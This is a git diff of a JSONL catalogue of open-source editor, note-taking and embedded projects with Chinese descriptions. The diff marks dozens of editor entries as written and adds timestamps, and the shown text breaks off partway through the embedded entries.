diff --git a/data/candidates.jsonl b/data/candidates.jsonl index 52c643aea..575897f16 100644 --- a/data/candidates.jsonl +++ b/data/candidates.jsonl @@ -1218,43 +1218,43 @@ {"slug":"lazyvim","area":"projects","topic":"editors","title":"LazyVim — lazy.nvim 驱动的发行","meta":{"col3":"~22k","col4":"folke 出品,按需懒加载 + 完整 IDE,Neovim 当代主流"},"url":"https://github.com/LazyVim/LazyVim","status":"written","claimed_by":null,"attempts":0,"source_file":"projects-editors.md"} {"slug":"nvchad","area":"projects","topic":"editors","title":"NvChad — 极致美观的 Neovim 配置","meta":{"col3":"~26k","col4":"0.5 秒启动 + 主题切换 UI,前端工程师的 Neovim 选择"},"url":"https://github.com/NvChad/NvChad","status":"written","claimed_by":null,"attempts":0,"source_file":"projects-editors.md"} {"slug":"astronvim","area":"projects","topic":"editors","title":"AstroNvim — 社区驱动 Neovim 配置","meta":{"col3":"~14k","col4":"模块化 + 插件市场,现代 Neovim 配置范例"},"url":"https://github.com/AstroNvim/AstroNvim","status":"written","claimed_by":null,"attempts":0,"source_file":"projects-editors.md"} -{"slug":"theia","area":"projects","topic":"editors","title":"Eclipse Theia — 云原生 IDE 框架","meta":{"col3":"~21k","col4":"VS Code 协议兼容 + 插件互通,可定制企业级云 IDE 基座"},"url":"https://github.com/eclipse-theia/theia","status":"queued","claimed_by":null,"attempts":0,"source_file":"projects-editors.md"} -{"slug":"code-server","area":"projects","topic":"editors","title":"code-server — 浏览器里的 VS Code","meta":{"col3":"~73k","col4":"单机部署即可远程访问完整 VS Code,云端开发普及代表"},"url":"https://github.com/coder/code-server","status":"queued","claimed_by":null,"attempts":0,"source_file":"projects-editors.md"} -{"slug":"openvscode-server","area":"projects","topic":"editors","title":"OpenVSCode Server — VS Code Server 上游","meta":{"col3":"~7k","col4":"Gitpod 维护的最小化补丁,让 microsoft/vscode 跑在远程"},"url":"https://github.com/gitpod-io/openvscode-server","status":"queued","claimed_by":null,"attempts":0,"source_file":"projects-editors.md"} -{"slug":"coder","area":"projects","topic":"editors","title":"Coder — 自托管开发环境平台","meta":{"col3":"~10k","col4":"Terraform 描述工作区 + SSH/VS Code/JetBrains 多入口,企业 DevBox"},"url":"https://github.com/coder/coder","status":"queued","claimed_by":null,"attempts":0,"source_file":"projects-editors.md"} -{"slug":"gitpod","area":"projects","topic":"editors","title":"Gitpod — 预构建云开发环境","meta":{"col3":"~13k","col4":"把 git 仓库变成\"prebuilt 工作区\",cloud workspace 鼻祖"},"url":"https://github.com/gitpod-io/gitpod","status":"queued","claimed_by":null,"attempts":0,"source_file":"projects-editors.md"} -{"slug":"eclipse-che","area":"projects","topic":"editors","title":"Eclipse Che — Kubernetes 原生云 IDE","meta":{"col3":"~7k","col4":"DevWorkspace + Devfile 标准化云 IDE 描述,企业级方案"},"url":"https://github.com/eclipse/che","status":"queued","claimed_by":null,"attempts":0,"source_file":"projects-editors.md"} -{"slug":"aider","area":"projects","topic":"editors","title":"Aider — 终端 AI 结对编程 CLI","meta":{"col3":"~36k","col4":"git-aware 的 CLI 编辑会话,把 LLM 编辑直接 commit 到仓库"},"url":"https://github.com/Aider-AI/aider","status":"queued","claimed_by":null,"attempts":0,"source_file":"projects-editors.md"} -{"slug":"cline","area":"projects","topic":"editors","title":"Cline — VS Code 自主编码代理","meta":{"col3":"~50k","col4":"\"看代码 + 改代码 + 跑命令\"全自主 VS Code agent"},"url":"https://github.com/cline/cline","status":"queued","claimed_by":null,"attempts":0,"source_file":"projects-editors.md"} -{"slug":"void","area":"projects","topic":"editors","title":"Void — 开源 Cursor 替代","meta":{"col3":"~24k","col4":"VS Code fork,自带 AI chat / inline edit / agent,模型自托管"},"url":"https://github.com/voideditor/void","status":"queued","claimed_by":null,"attempts":0,"source_file":"projects-editors.md"} -{"slug":"opencode","area":"projects","topic":"editors","title":"opencode — SST 出品的终端 AI IDE","meta":{"col3":"~12k","col4":"终端里的 100% TypeScript AI 编程助手,多模型可切换"},"url":"https://github.com/sst/opencode","status":"queued","claimed_by":null,"attempts":0,"source_file":"projects-editors.md"} -{"slug":"roo-code","area":"projects","topic":"editors","title":"Roo Code — 多模式 VS Code AI 助手","meta":{"col3":"~16k","col4":"Cline 分叉,加 architect/code/debug 多角色切换"},"url":"https://github.com/RooCodeInc/Roo-Code","status":"queued","claimed_by":null,"attempts":0,"source_file":"projects-editors.md"} -{"slug":"marktext","area":"projects","topic":"editors","title":"MarkText — 实时预览 Markdown 编辑器","meta":{"col3":"~52k","col4":"\"所见即所得\"风格 markdown,无双栏切换的纯净写作"},"url":"https://github.com/marktext/marktext","status":"queued","claimed_by":null,"attempts":0,"source_file":"projects-editors.md"} -{"slug":"zettlr","area":"projects","topic":"editors","title":"Zettlr — 学者向 Markdown 编辑器","meta":{"col3":"~10k","col4":"Citation/BibTeX/Pandoc 内置,论文写作首选 markdown 工具"},"url":"https://github.com/Zettlr/Zettlr","status":"queued","claimed_by":null,"attempts":0,"source_file":"projects-editors.md"} -{"slug":"ghostwriter","area":"projects","topic":"editors","title":"ghostwriter — Qt 干净 Markdown 写作器","meta":{"col3":"~2.5k","col4":"暗色专注 + Hemingway 风格高亮,长文写作首选"},"url":"https://github.com/wereturtle/ghostwriter","status":"queued","claimed_by":null,"attempts":0,"source_file":"projects-editors.md"} -{"slug":"foam","area":"projects","topic":"editors","title":"Foam — VS Code 上的 Roam-like","meta":{"col3":"~17k","col4":"把 VS Code 改造成 Zettelkasten 工作流,纯 markdown + 双链"},"url":"https://github.com/foambubble/foam","status":"queued","claimed_by":null,"attempts":0,"source_file":"projects-editors.md"} -{"slug":"silverbullet","area":"projects","topic":"editors","title":"SilverBullet — 自托管笔记 web 应用","meta":{"col3":"~3k","col4":"TS 实现的 markdown + 反查链 + 插件即代码块"},"url":"https://github.com/silverbulletmd/silverbullet","status":"queued","claimed_by":null,"attempts":0,"source_file":"projects-editors.md"} -{"slug":"logseq","area":"projects","topic":"editors","title":"Logseq — 块结构离线知识库","meta":{"col3":"~36k","col4":"\"段落即图节点\"的 Roam 开源对标,本地优先 + 双链全文"},"url":"https://github.com/logseq/logseq","status":"queued","claimed_by":null,"attempts":0,"source_file":"projects-editors.md"} -{"slug":"joplin","area":"projects","topic":"editors","title":"Joplin — 开源 Evernote 替代","meta":{"col3":"~50k","col4":"E2E 加密 + 多设备同步 + Markdown,跨平台个人笔记标杆"},"url":"https://github.com/laurent22/joplin","status":"queued","claimed_by":null,"attempts":0,"source_file":"projects-editors.md"} -{"slug":"anytype-ts","area":"projects","topic":"editors","title":"Anytype — 本地优先块编辑器","meta":{"col3":"~5k","col4":"P2P + E2E + 类型化对象图,去中心化 Notion 思路"},"url":"https://github.com/anyproto/anytype-ts","status":"queued","claimed_by":null,"attempts":0,"source_file":"projects-editors.md"} -{"slug":"trilium","area":"projects","topic":"editors","title":"Trilium — 树形层级笔记系统","meta":{"col3":"~30k","col4":"服务端 + 客户端架构,超大笔记树 + 关系图 + 脚本"},"url":"https://github.com/zadam/trilium","status":"queued","claimed_by":null,"attempts":0,"source_file":"projects-editors.md"} -{"slug":"siyuan","area":"projects","topic":"editors","title":"SiYuan — 国产块结构笔记","meta":{"col3":"~24k","col4":"思源笔记,本地优先 + 双链 + 自托管 + 中文优化"},"url":"https://github.com/siyuan-note/siyuan","status":"queued","claimed_by":null,"attempts":0,"source_file":"projects-editors.md"} -{"slug":"appflowy","area":"projects","topic":"editors","title":"AppFlowy — Rust 写的开源 Notion","meta":{"col3":"~64k","col4":"Flutter 客户端 + Rust 内核,自托管 Notion 对标的最大项目"},"url":"https://github.com/AppFlowy-IO/AppFlowy","status":"queued","claimed_by":null,"attempts":0,"source_file":"projects-editors.md"} -{"slug":"texstudio","area":"projects","topic":"editors","title":"TeXstudio — LaTeX IDE","meta":{"col3":"~3.4k","col4":"Qt 实现的 LaTeX 集成编辑器,宏 / 公式补全 / 实时预览"},"url":"https://github.com/texstudio-org/texstudio","status":"queued","claimed_by":null,"attempts":0,"source_file":"projects-editors.md"} -{"slug":"overleaf","area":"projects","topic":"editors","title":"Overleaf — 在线 LaTeX 协作","meta":{"col3":"~16k","col4":"Web 端实时协作 LaTeX,社区版可自托管"},"url":"https://github.com/overleaf/overleaf","status":"queued","claimed_by":null,"attempts":0,"source_file":"projects-editors.md"} -{"slug":"hedgedoc","area":"projects","topic":"editors","title":"HedgeDoc — 协作 Markdown 编辑","meta":{"col3":"~14k","col4":"CodiMD 分叉,多人实时编辑 markdown,带演示模式"},"url":"https://github.com/hedgedoc/hedgedoc","status":"queued","claimed_by":null,"attempts":0,"source_file":"projects-editors.md"} -{"slug":"etherpad-lite","area":"projects","topic":"editors","title":"Etherpad — 经典协作文本编辑器","meta":{"col3":"~17k","col4":"OT 算法实战代表,浏览器多人同时编辑文档先驱"},"url":"https://github.com/ether/etherpad-lite","status":"queued","claimed_by":null,"attempts":0,"source_file":"projects-editors.md"} -{"slug":"outline","area":"projects","topic":"editors","title":"Outline — 团队 Wiki 协作平台","meta":{"col3":"~30k","col4":"ProseMirror 富文本 + 实时协作 + 团队权限,开源 Notion-for-team"},"url":"https://github.com/outline/outline","status":"queued","claimed_by":null,"attempts":0,"source_file":"projects-editors.md"} -{"slug":"bookstack","area":"projects","topic":"editors","title":"BookStack — 文档型 Wiki","meta":{"col3":"~17k","col4":"Book/Chapter/Page 三层结构 + WYSIWYG,企业知识库自托管"},"url":"https://github.com/BookStackApp/BookStack","status":"queued","claimed_by":null,"attempts":0,"source_file":"projects-editors.md"} -{"slug":"jupyter-notebook","area":"projects","topic":"editors","title":"Jupyter Notebook — 经典数据科学笔记本","meta":{"col3":"~12k","col4":"IPython 衍生,定义\"代码 + 输出 + Markdown\"交互范式"},"url":"https://github.com/jupyter/notebook","status":"queued","claimed_by":null,"attempts":0,"source_file":"projects-editors.md"} -{"slug":"jupyterlab","area":"projects","topic":"editors","title":"JupyterLab — 下一代 Jupyter IDE","meta":{"col3":"~15k","col4":"标签页 / 多面板布局 + 扩展,把 Jupyter 升级为完整 IDE"},"url":"https://github.com/jupyterlab/jupyterlab","status":"queued","claimed_by":null,"attempts":0,"source_file":"projects-editors.md"} -{"slug":"marimo","area":"projects","topic":"editors","title":"marimo — 反应式 Python 笔记本","meta":{"col3":"~17k","col4":"单文件 .py + DAG 自动重算,去掉 Jupyter 隐藏状态痛点"},"url":"https://github.com/marimo-team/marimo","status":"queued","claimed_by":null,"attempts":0,"source_file":"projects-editors.md"} -{"slug":"pluto-jl","area":"projects","topic":"editors","title":"Pluto.jl — Julia 反应式笔记本","meta":{"col3":"~5.4k","col4":"单元改动自动级联重算,纯 Julia 实现,浏览器即 IDE"},"url":"https://github.com/fonsp/Pluto.jl","status":"queued","claimed_by":null,"attempts":0,"source_file":"projects-editors.md"} -{"slug":"zeppelin","area":"projects","topic":"editors","title":"Apache Zeppelin — JVM 多语言笔记本","meta":{"col3":"~6k","col4":"Spark / Flink / Scala / SQL / Python 一锅端,企业大数据交互"},"url":"https://github.com/apache/zeppelin","status":"queued","claimed_by":null,"attempts":0,"source_file":"projects-editors.md"} -{"slug":"blender","area":"projects","topic":"editors","title":"Blender — 全流程 3D 创作套件","meta":{"col3":"~12k","col4":"建模 / 动画 / 渲染 / 视频剪辑全栈,开源 3D 内容创作旗舰"},"url":"https://github.com/blender/blender","status":"queued","claimed_by":null,"attempts":0,"source_file":"projects-editors.md"} -{"slug":"godot","area":"projects","topic":"editors","title":"Godot Engine — 开源游戏引擎 + 编辑器","meta":{"col3":"~95k","col4":"节点树 + GDScript + 自带编辑器,独立游戏开发器代表"},"url":"https://github.com/godotengine/godot","status":"queued","claimed_by":null,"attempts":0,"source_file":"projects-editors.md"} -{"slug":"inkscape","area":"projects","topic":"editors","title":"Inkscape — 矢量图形编辑器","meta":{"col3":"~8k","col4":"C++ 实现的 SVG 原生编辑器,对标 Illustrator 的开源标准"},"url":"https://github.com/inkscape/inkscape","status":"queued","claimed_by":null,"attempts":0,"source_file":"projects-editors.md"} -{"slug":"krita","area":"projects","topic":"editors","title":"Krita — 数字绘画专业编辑器","meta":{"col3":"~1.4k","col4":"Qt + KDE 出品,CMYK / 笔刷引擎专业级,插画师开源首选"},"url":"https://github.com/KDE/krita","status":"queued","claimed_by":null,"attempts":0,"source_file":"projects-editors.md"} +{"slug":"theia","area":"projects","topic":"editors","title":"Eclipse Theia — 云原生 IDE 框架","meta":{"col3":"~21k","col4":"VS Code 协议兼容 + 插件互通,可定制企业级云 IDE 基座"},"url":"https://github.com/eclipse-theia/theia","status":"written","claimed_by":null,"attempts":0,"source_file":"projects-editors.md","written_at":"2026-06-13T03:19:30.216Z"} +{"slug":"code-server","area":"projects","topic":"editors","title":"code-server — 浏览器里的 VS Code","meta":{"col3":"~73k","col4":"单机部署即可远程访问完整 VS Code,云端开发普及代表"},"url":"https://github.com/coder/code-server","status":"written","claimed_by":null,"attempts":0,"source_file":"projects-editors.md","written_at":"2026-06-13T03:19:32.315Z"} +{"slug":"openvscode-server","area":"projects","topic":"editors","title":"OpenVSCode Server — VS Code Server 上游","meta":{"col3":"~7k","col4":"Gitpod 维护的最小化补丁,让 microsoft/vscode 跑在远程"},"url":"https://github.com/gitpod-io/openvscode-server","status":"written","claimed_by":null,"attempts":0,"source_file":"projects-editors.md","written_at":"2026-06-13T03:23:59.393Z"} +{"slug":"coder","area":"projects","topic":"editors","title":"Coder — 自托管开发环境平台","meta":{"col3":"~10k","col4":"Terraform 描述工作区 + SSH/VS Code/JetBrains 多入口,企业 DevBox"},"url":"https://github.com/coder/coder","status":"written","claimed_by":null,"attempts":0,"source_file":"projects-editors.md"} +{"slug":"gitpod","area":"projects","topic":"editors","title":"Gitpod — 预构建云开发环境","meta":{"col3":"~13k","col4":"把 git 仓库变成\"prebuilt 工作区\",cloud workspace 鼻祖"},"url":"https://github.com/gitpod-io/gitpod","status":"written","claimed_by":null,"attempts":0,"source_file":"projects-editors.md"} +{"slug":"eclipse-che","area":"projects","topic":"editors","title":"Eclipse Che — Kubernetes 原生云 IDE","meta":{"col3":"~7k","col4":"DevWorkspace + Devfile 标准化云 IDE 描述,企业级方案"},"url":"https://github.com/eclipse/che","status":"written","claimed_by":null,"attempts":0,"source_file":"projects-editors.md","written_at":"2026-06-13T03:35:44.694Z"} +{"slug":"aider","area":"projects","topic":"editors","title":"Aider — 终端 AI 结对编程 CLI","meta":{"col3":"~36k","col4":"git-aware 的 CLI 编辑会话,把 LLM 编辑直接 commit 到仓库"},"url":"https://github.com/Aider-AI/aider","status":"written","claimed_by":null,"attempts":0,"source_file":"projects-editors.md","written_at":"2026-06-13T03:38:46.315Z"} +{"slug":"cline","area":"projects","topic":"editors","title":"Cline — VS Code 自主编码代理","meta":{"col3":"~50k","col4":"\"看代码 + 改代码 + 跑命令\"全自主 VS Code agent"},"url":"https://github.com/cline/cline","status":"written","claimed_by":null,"attempts":0,"source_file":"projects-editors.md","written_at":"2026-06-13T03:41:02.265Z"} +{"slug":"void","area":"projects","topic":"editors","title":"Void — 开源 Cursor 替代","meta":{"col3":"~24k","col4":"VS Code fork,自带 AI chat / inline edit / agent,模型自托管"},"url":"https://github.com/voideditor/void","status":"written","claimed_by":null,"attempts":0,"source_file":"projects-editors.md","written_at":"2026-06-13T03:46:04.723Z"} +{"slug":"opencode","area":"projects","topic":"editors","title":"opencode — SST 出品的终端 AI IDE","meta":{"col3":"~12k","col4":"终端里的 100% TypeScript AI 编程助手,多模型可切换"},"url":"https://github.com/sst/opencode","status":"written","claimed_by":null,"attempts":0,"source_file":"projects-editors.md"} +{"slug":"roo-code","area":"projects","topic":"editors","title":"Roo Code — 多模式 VS Code AI 助手","meta":{"col3":"~16k","col4":"Cline 分叉,加 architect/code/debug 多角色切换"},"url":"https://github.com/RooCodeInc/Roo-Code","status":"written","claimed_by":null,"attempts":0,"source_file":"projects-editors.md","written_at":"2026-06-13T03:54:57.277Z"} +{"slug":"marktext","area":"projects","topic":"editors","title":"MarkText — 实时预览 Markdown 编辑器","meta":{"col3":"~52k","col4":"\"所见即所得\"风格 markdown,无双栏切换的纯净写作"},"url":"https://github.com/marktext/marktext","status":"written","claimed_by":null,"attempts":0,"source_file":"projects-editors.md"} +{"slug":"zettlr","area":"projects","topic":"editors","title":"Zettlr — 学者向 Markdown 编辑器","meta":{"col3":"~10k","col4":"Citation/BibTeX/Pandoc 内置,论文写作首选 markdown 工具"},"url":"https://github.com/Zettlr/Zettlr","status":"written","claimed_by":null,"attempts":0,"source_file":"projects-editors.md","written_at":"2026-06-13T04:01:26.271Z"} +{"slug":"ghostwriter","area":"projects","topic":"editors","title":"ghostwriter — Qt 干净 Markdown 写作器","meta":{"col3":"~2.5k","col4":"暗色专注 + Hemingway 风格高亮,长文写作首选"},"url":"https://github.com/wereturtle/ghostwriter","status":"written","claimed_by":null,"attempts":0,"source_file":"projects-editors.md","written_at":"2026-06-13T04:06:28.440Z"} +{"slug":"foam","area":"projects","topic":"editors","title":"Foam — VS Code 上的 Roam-like","meta":{"col3":"~17k","col4":"把 VS Code 改造成 Zettelkasten 工作流,纯 markdown + 双链"},"url":"https://github.com/foambubble/foam","status":"written","claimed_by":null,"attempts":0,"source_file":"projects-editors.md","written_at":"2026-06-13T04:11:30.607Z"} +{"slug":"silverbullet","area":"projects","topic":"editors","title":"SilverBullet — 自托管笔记 web 应用","meta":{"col3":"~3k","col4":"TS 实现的 markdown + 反查链 + 插件即代码块"},"url":"https://github.com/silverbulletmd/silverbullet","status":"written","claimed_by":null,"attempts":0,"source_file":"projects-editors.md"} +{"slug":"logseq","area":"projects","topic":"editors","title":"Logseq — 块结构离线知识库","meta":{"col3":"~36k","col4":"\"段落即图节点\"的 Roam 开源对标,本地优先 + 双链全文"},"url":"https://github.com/logseq/logseq","status":"written","claimed_by":null,"attempts":0,"source_file":"projects-editors.md","written_at":"2026-06-13T04:20:08.771Z"} +{"slug":"joplin","area":"projects","topic":"editors","title":"Joplin — 开源 Evernote 替代","meta":{"col3":"~50k","col4":"E2E 加密 + 多设备同步 + Markdown,跨平台个人笔记标杆"},"url":"https://github.com/laurent22/joplin","status":"written","claimed_by":null,"attempts":0,"source_file":"projects-editors.md","written_at":"2026-06-13T04:23:29.382Z"} +{"slug":"anytype-ts","area":"projects","topic":"editors","title":"Anytype — 本地优先块编辑器","meta":{"col3":"~5k","col4":"P2P + E2E + 类型化对象图,去中心化 Notion 思路"},"url":"https://github.com/anyproto/anytype-ts","status":"written","claimed_by":null,"attempts":0,"source_file":"projects-editors.md"} +{"slug":"trilium","area":"projects","topic":"editors","title":"Trilium — 树形层级笔记系统","meta":{"col3":"~30k","col4":"服务端 + 客户端架构,超大笔记树 + 关系图 + 脚本"},"url":"https://github.com/zadam/trilium","status":"written","claimed_by":null,"attempts":0,"source_file":"projects-editors.md","written_at":"2026-06-13T04:31:51.170Z"} +{"slug":"siyuan","area":"projects","topic":"editors","title":"SiYuan — 国产块结构笔记","meta":{"col3":"~24k","col4":"思源笔记,本地优先 + 双链 + 自托管 + 中文优化"},"url":"https://github.com/siyuan-note/siyuan","status":"written","claimed_by":null,"attempts":0,"source_file":"projects-editors.md","written_at":"2026-06-13T04:33:36.075Z"} +{"slug":"appflowy","area":"projects","topic":"editors","title":"AppFlowy — Rust 写的开源 Notion","meta":{"col3":"~64k","col4":"Flutter 客户端 + Rust 内核,自托管 Notion 对标的最大项目"},"url":"https://github.com/AppFlowy-IO/AppFlowy","status":"written","claimed_by":null,"attempts":0,"source_file":"projects-editors.md","written_at":"2026-06-13T04:37:39.583Z"} +{"slug":"texstudio","area":"projects","topic":"editors","title":"TeXstudio — LaTeX IDE","meta":{"col3":"~3.4k","col4":"Qt 实现的 LaTeX 集成编辑器,宏 / 公式补全 / 实时预览"},"url":"https://github.com/texstudio-org/texstudio","status":"written","claimed_by":null,"attempts":0,"source_file":"projects-editors.md","written_at":"2026-06-13T04:41:59.564Z"} +{"slug":"overleaf","area":"projects","topic":"editors","title":"Overleaf — 在线 LaTeX 协作","meta":{"col3":"~16k","col4":"Web 端实时协作 LaTeX,社区版可自托管"},"url":"https://github.com/overleaf/overleaf","status":"written","claimed_by":null,"attempts":0,"source_file":"projects-editors.md","written_at":"2026-06-13T04:43:14.780Z"} +{"slug":"hedgedoc","area":"projects","topic":"editors","title":"HedgeDoc — 协作 Markdown 编辑","meta":{"col3":"~14k","col4":"CodiMD 分叉,多人实时编辑 markdown,带演示模式"},"url":"https://github.com/hedgedoc/hedgedoc","status":"written","claimed_by":null,"attempts":0,"source_file":"projects-editors.md"} +{"slug":"etherpad-lite","area":"projects","topic":"editors","title":"Etherpad — 经典协作文本编辑器","meta":{"col3":"~17k","col4":"OT 算法实战代表,浏览器多人同时编辑文档先驱"},"url":"https://github.com/ether/etherpad-lite","status":"written","claimed_by":null,"attempts":0,"source_file":"projects-editors.md","written_at":"2026-06-13T04:48:20.018Z"} +{"slug":"outline","area":"projects","topic":"editors","title":"Outline — 团队 Wiki 协作平台","meta":{"col3":"~30k","col4":"ProseMirror 富文本 + 实时协作 + 团队权限,开源 Notion-for-team"},"url":"https://github.com/outline/outline","status":"written","claimed_by":null,"attempts":0,"source_file":"projects-editors.md","written_at":"2026-06-13T04:54:11.573Z"} +{"slug":"bookstack","area":"projects","topic":"editors","title":"BookStack — 文档型 Wiki","meta":{"col3":"~17k","col4":"Book/Chapter/Page 三层结构 + WYSIWYG,企业知识库自托管"},"url":"https://github.com/BookStackApp/BookStack","status":"written","claimed_by":null,"attempts":0,"source_file":"projects-editors.md"} +{"slug":"jupyter-notebook","area":"projects","topic":"editors","title":"Jupyter Notebook — 经典数据科学笔记本","meta":{"col3":"~12k","col4":"IPython 衍生,定义\"代码 + 输出 + Markdown\"交互范式"},"url":"https://github.com/jupyter/notebook","status":"written","claimed_by":null,"attempts":0,"source_file":"projects-editors.md","written_at":"2026-06-13T04:58:40.333Z"} +{"slug":"jupyterlab","area":"projects","topic":"editors","title":"JupyterLab — 下一代 Jupyter IDE","meta":{"col3":"~15k","col4":"标签页 / 多面板布局 + 扩展,把 Jupyter 升级为完整 IDE"},"url":"https://github.com/jupyterlab/jupyterlab","status":"written","claimed_by":null,"attempts":0,"source_file":"projects-editors.md","written_at":"2026-06-13T05:02:13.030Z"} +{"slug":"marimo","area":"projects","topic":"editors","title":"marimo — 反应式 Python 笔记本","meta":{"col3":"~17k","col4":"单文件 .py + DAG 自动重算,去掉 Jupyter 隐藏状态痛点"},"url":"https://github.com/marimo-team/marimo","status":"written","claimed_by":null,"attempts":0,"source_file":"projects-editors.md","written_at":"2026-06-13T05:03:37.157Z"} +{"slug":"pluto-jl","area":"projects","topic":"editors","title":"Pluto.jl — Julia 反应式笔记本","meta":{"col3":"~5.4k","col4":"单元改动自动级联重算,纯 Julia 实现,浏览器即 IDE"},"url":"https://github.com/fonsp/Pluto.jl","status":"written","claimed_by":null,"attempts":0,"source_file":"projects-editors.md","written_at":"2026-06-13T05:07:29.113Z"} +{"slug":"zeppelin","area":"projects","topic":"editors","title":"Apache Zeppelin — JVM 多语言笔记本","meta":{"col3":"~6k","col4":"Spark / Flink / Scala / SQL / Python 一锅端,企业大数据交互"},"url":"https://github.com/apache/zeppelin","status":"written","claimed_by":null,"attempts":0,"source_file":"projects-editors.md"} +{"slug":"blender","area":"projects","topic":"editors","title":"Blender — 全流程 3D 创作套件","meta":{"col3":"~12k","col4":"建模 / 动画 / 渲染 / 视频剪辑全栈,开源 3D 内容创作旗舰"},"url":"https://github.com/blender/blender","status":"written","claimed_by":null,"attempts":0,"source_file":"projects-editors.md","written_at":"2026-06-13T05:13:30.408Z"} +{"slug":"godot","area":"projects","topic":"editors","title":"Godot Engine — 开源游戏引擎 + 编辑器","meta":{"col3":"~95k","col4":"节点树 + GDScript + 自带编辑器,独立游戏开发器代表"},"url":"https://github.com/godotengine/godot","status":"written","claimed_by":null,"attempts":0,"source_file":"projects-editors.md","written_at":"2026-06-13T05:14:29.583Z"} +{"slug":"inkscape","area":"projects","topic":"editors","title":"Inkscape — 矢量图形编辑器","meta":{"col3":"~8k","col4":"C++ 实现的 SVG 原生编辑器,对标 Illustrator 的开源标准"},"url":"https://github.com/inkscape/inkscape","status":"written","claimed_by":null,"attempts":0,"source_file":"projects-editors.md","written_at":"2026-06-13T05:18:45.162Z"} +{"slug":"krita","area":"projects","topic":"editors","title":"Krita — 数字绘画专业编辑器","meta":{"col3":"~1.4k","col4":"Qt + KDE 出品,CMYK / 笔刷引擎专业级,插画师开源首选"},"url":"https://github.com/KDE/krita","status":"written","claimed_by":null,"attempts":0,"source_file":"projects-editors.md"} {"slug":"freertos","area":"projects","topic":"embedded","title":"FreeRTOS-Kernel","meta":{"col3":"AWS 接管的全球第一 MCU 内核,~10k 行 C,调度+IPC+内存全栈源码教科书","col4":"2.8k"},"url":"https://github.com/FreeRTOS/FreeRTOS-Kernel","status":"written","claimed_by":null,"attempts":0,"source_file":"projects-embedded.md"} {"slug":"zephyr","area":"projects","topic":"embedded","title":"Zephyr","meta":{"col3":"Linux Foundation 的现代 RTOS,Apache 2.0,多板 BSP / 网络栈 / BLE / Thread 一体","col4":"11k"},"url":"https://github.com/zephyrproject-rtos/zephyr","status":"written","claimed_by":null,"attempts":0,"source_file":"projects-embedded.md"} {"slug":"rt-thread","area":"projects","topic":"embedded","title":"RT-Thread","meta":{"col3":"中文社区主导的物联网 RTOS,组件化设计,国产 MCU 板级支持最广","col4":"11k"},"url":"https://github.com/RT-Thread/rt-thread","status":"written","claimed_by":null,"attempts":0,"source_file":"projects-embedded.md"} @@ -1273,37 +1273,37 @@ {"slug":"lwip","area":"projects","topic":"embedded","title":"lwIP","meta":{"col3":"轻量级 TCP/IP 协议栈,~40KB ROM 跑 IPv4/6 + TCP + DHCP,FreeRTOS / Zephyr 默认网卡栈","col4":"2.6k"},"url":"https://github.com/lwip-tcpip/lwip","status":"written","claimed_by":null,"attempts":0,"source_file":"projects-embedded.md"} {"slug":"mbedtls","area":"projects","topic":"embedded","title":"Mbed TLS","meta":{"col3":"Arm 维护的小型 TLS 1.3 / X.509 / 加密原语库,ESP-IDF / Zephyr 默认 TLS 后端","col4":"5.9k"},"url":"https://github.com/Mbed-TLS/mbedtls","status":"written","claimed_by":null,"attempts":0,"source_file":"projects-embedded.md"} {"slug":"freemodbus","area":"projects","topic":"embedded","title":"FreeModbus","meta":{"col3":"工业现场总线 Modbus RTU / TCP 主从机协议栈 C 实现,PLC 通信学习样本","col4":"0.7k"},"url":"https://github.com/cwalter-at/freemodbus","status":"written","claimed_by":null,"attempts":0,"source_file":"projects-embedded.md"} -{"slug":"openthread","area":"projects","topic":"embedded","title":"OpenThread","meta":{"col3":"Google 开源的 Thread 1.3 协议实现,IPv6 over 802.15.4 mesh 事实标准","col4":"3.7k"},"url":"https://github.com/openthread/openthread","status":"queued","claimed_by":null,"attempts":0,"source_file":"projects-embedded.md"} -{"slug":"sdk-nrf","area":"projects","topic":"embedded","title":"Nordic Connect SDK","meta":{"col3":"Nordic nRF52/nRF53/nRF54 全家桶 SDK,BLE / Thread / Matter / 蜂窝 IoT 一体","col4":"1.7k"},"url":"https://github.com/nrfconnect/sdk-nrf","status":"queued","claimed_by":null,"attempts":0,"source_file":"projects-embedded.md"} -{"slug":"lora-mac-node","area":"projects","topic":"embedded","title":"LoRaMac-node","meta":{"col3":"LoRa Alliance 参考实现,LoRaWAN MAC 层 + 区域参数 + Class A/B/C 完整","col4":"1.9k"},"url":"https://github.com/Lora-net/LoRaMac-node","status":"queued","claimed_by":null,"attempts":0,"source_file":"projects-embedded.md"} -{"slug":"mosquitto","area":"projects","topic":"embedded","title":"Eclipse Mosquitto","meta":{"col3":"C 写的 MQTT broker 事实标准,~30k 行,IoT 入门 broker 首选","col4":"9.5k"},"url":"https://github.com/eclipse-mosquitto/mosquitto","status":"queued","claimed_by":null,"attempts":0,"source_file":"projects-embedded.md"} -{"slug":"nanomq","area":"projects","topic":"embedded","title":"NanoMQ","meta":{"col3":"C 写的边缘超轻量 MQTT broker,单线程 / 100KB 二进制,运行在网关 / 容器侧","col4":"1.9k"},"url":"https://github.com/nanomq/nanomq","status":"queued","claimed_by":null,"attempts":0,"source_file":"projects-embedded.md"} -{"slug":"tflite-micro","area":"projects","topic":"embedded","title":"TensorFlow Lite Micro","meta":{"col3":"Google 的微控制器 TF Lite runtime,~16KB ROM 跑 INT8 推理,无 OS / 无 malloc","col4":"2.5k"},"url":"https://github.com/tensorflow/tflite-micro","status":"queued","claimed_by":null,"attempts":0,"source_file":"projects-embedded.md"} -{"slug":"esp-dl","area":"projects","topic":"embedded","title":"ESP-DL","meta":{"col3":"Espressif 的 ESP32 神经网络推理库,针对 ESP32-S3 向量指令优化","col4":"1.1k"},"url":"https://github.com/espressif/esp-dl","status":"queued","claimed_by":null,"attempts":0,"source_file":"projects-embedded.md"} -{"slug":"cmsis-nn","area":"projects","topic":"embedded","title":"CMSIS-NN","meta":{"col3":"Arm 的 Cortex-M 神经网络算子库,SIMD/Helium 加速,TFLM 默认后端","col4":"1k"},"url":"https://github.com/ARM-software/CMSIS-NN","status":"queued","claimed_by":null,"attempts":0,"source_file":"projects-embedded.md"} -{"slug":"ncnn","area":"projects","topic":"embedded","title":"ncnn","meta":{"col3":"腾讯开源的端侧 CPU 推理框架,无第三方依赖,ARM NEON / Vulkan 双后端","col4":"21k"},"url":"https://github.com/Tencent/ncnn","status":"queued","claimed_by":null,"attempts":0,"source_file":"projects-embedded.md"} -{"slug":"paddle-lite","area":"projects","topic":"embedded","title":"Paddle Lite","meta":{"col3":"百度的端侧轻量推理引擎,支持 ARM CPU / GPU / NPU / FPGA,模型转换 + 